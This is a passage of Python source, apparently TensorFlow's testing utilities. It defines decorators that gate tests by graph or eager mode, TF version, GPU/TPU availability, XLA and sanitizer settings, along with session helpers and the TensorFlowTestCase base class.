be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_or_tpu(func=None):
"""Execute the decorated test only if a physical GPU or TPU is available.
This function is intended to be applied to tests that require the presence
of a physical GPU or TPU. It complies with the following rules:
- If a GPU is available, the test will run on the GPU.
- If a GPU is absent and a TPU is available, the test will run on the TPU.
- If both GPU and TPU are absent, the test will be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_or_tpu` only supports test methods.")
def decorated(self, *args, **kwargs):
if config.list_physical_devices("GPU"):
return f(self, "GPU", *args, **kwargs)
if config.list_physical_devices("TPU"):
return f(self, "TPU", *args, **kwargs)
self.skipTest("Test requires GPU or TPU")
return decorated
return decorator if func is None else decorator(func)
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
@contextlib.contextmanager
def deterministic_ops():
"""Enables deterministic ops."""
try:
config.enable_deterministic_ops(True)
yield
finally:
config.enable_deterministic_ops(False)
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return tf_decorator.make_decorator(func, decorated)
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_asan(description): # pylint: disable=unused-argument
"""Execute the test method only if ASAN is not enabled."""
execute_func = not is_asan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_msan(description): # pylint: disable=unused-argument
"""Execute the test method only if MSAN is not enabled."""
execute_func = not is_msan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tsan(description): # pylint: disable=unused-argument
"""Execute the test method only if TSAN is not enabled."""
execute_func = not is_tsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_ubsan(description): # pylint: disable=unused-argument
"""Execute the test method only if UBSAN is not enabled."""
execute_func = not is_ubsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
# Make sure we get unfiltered stack traces during the test
traceback_utils.disable_traceback_filtering()
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
# is_mlir_bridge_enabled() returns None, the user did not explictly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session():
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session() as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
